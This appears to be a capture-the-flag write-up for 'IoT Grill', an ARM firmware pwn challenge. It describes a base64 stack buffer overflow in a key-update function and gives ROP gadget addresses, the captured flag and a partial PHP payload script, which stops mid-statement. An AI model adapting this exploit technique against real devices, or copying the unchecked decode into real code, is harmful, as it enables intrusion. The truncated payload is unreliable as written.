Rating: 5.0
IoT Grill is a pwn task.
An archive containing an ARM firmware and a qemu script to run it is provided.
The fimrware simulates a connected grill. It is possible to change the temperature settings, start the grill and update the device key.
Reversing an ARM firmware can be time consuming.
Fortunately, looking at cross references to strings such as Device key
find the menu function. It also helps identify the printk
By looking at the cross references it is possible to identify the main function.
The Poweroff
menu option leaves the function.
The Grill Cevape
menu option prints a string.
The Change temperature setting
changes the temperature between 50 and 500
The Update device key
updates the device key. There is special case if the key
starts with B64:
: it will decode the input as base64.
char *string;
size_t size;
size_t clearSize;
char buffer[0x24];
printk("Enter a new device key> ");
string = readString();
size = strlen(string);
if(0 == strncmp(string, "B64:", 4)) {
/* Don't write, but calculate the size and write in in clearSize */
b64_decode(NULL, 0, &clearSize, string + 4, size - 4);
/* Decode into buffer */
b64_decode(buffer, clearSize, &clearSize, string + 4, size - 4);
} else {
/* ... */
This function is vulnerable to a classic stack-based buffer overflow.
This challenge was solved by using a simple ROP chain that calls printk(flag)
The ROP chain is the following :
0x00001458: pop {r0, pc}
0x00004043: "BCTF{flag}"
0x00002CB0: printk
The only particularity of the ARM architecture is that instructions in THUMBS mode must have their least significant bit set.
The changeKey
function returns using pop {r4, r5, r6, r7, pc}
. This has to
be taken into account when padding the stack.
Flag: BCTF{c0ngr4ts_y0u_put_a_gr1ll_on_th3_n3t_and_n0w_cevap3_ar3_burn3d}
const POPR0 = 0x00001458 | 1;
const FLAG = 0x00004043;
const PRINTK = 0x00002CB0 | 1;
$payload = str_repeat("A", 0x24);
$payload .= pack("V*",
0x44444444, 0x55555555, 0x66666666, 0x77777777,
printf("B64:%s\n", base64_encode($payload));